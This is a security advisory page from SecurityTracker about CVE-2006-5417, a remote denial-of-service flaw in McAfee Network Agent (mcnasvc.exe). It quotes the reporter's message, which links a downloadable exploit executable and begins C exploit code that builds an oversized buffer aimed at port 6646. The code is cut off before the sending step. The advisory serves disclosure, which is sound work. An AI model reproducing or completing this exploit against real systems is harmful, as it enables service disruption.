Mcafee Network Agent Lets Remote Users Deny Service
|
|
SecurityTracker Alert ID: 1017057
|
|
SecurityTracker URL: http://securitytracker.com/id?1017057
|
|
CVE Reference: CVE-2006-5417
(Links to External Site)
|
Updated: Jun 2 2008
|
Original Entry Date: Oct 12 2006
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Description: JAAScois reported a vulnerability in Mcafee Network Agent. A remote user can cause denial of service conditions.
A remote user can send specially crafted data to cause the target service to crash.
'mcnasvc.exe' version 1.0.178.0 is affected.
|
Impact: A remote user can cause denial of service conditions.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.mcafee.com/ (Links to External Site)
|
Cause: Not specified
|
Underlying OS: Windows (Any)
|
Reported By: "JAAScois Security Team" <admin@jaascois.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 12 Oct 2006 07:19:49 -0500 (CDT)
From: "JAAScois Security Team" <admin@jaascois.com>
Subject: Mcafee Network Agent (mcnasvc.exe) Remote DoS
|
try:
http://www.jaascois.com/exploits/18602025/JcMc10.exe
/////////////////////////////////////////////////////
// Mcafee Network Agent (mcnasvc.exe) Remote DoS
// By JAAScois [ http://www.jaascois.com ]
// Teston [ mcnasvc.exe ver1.0.178.0 ]
// Path [C:\Program Files\Common Files\McAfee\MNA]
// Port: [6646]
/////////////////////////////////////////////////////
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
int main (int argc, char *argv[]){
struct sockaddr_in tcp;
static SOCKET sock;
int ii=0;
unsigned char buf[17000];
WSADATA wsaData;
// packet
for(ii=0;ii<17000;ii++){
buf[ii]=0x90;
}
printf("[>>] Mcafee Network Agent (mcnasvc.exe ver 1.0.178.0) Remote DoS
\n");
printf("[>>] By JAAScois [ http://www.jaascois.com ] \n");
printf("[>>] +\n");
printf("[>>] +\n");
if(argc<2){
printf("[>>] Usage:%s 190.160.24.1\n",argv[0]);
return 1;
|
|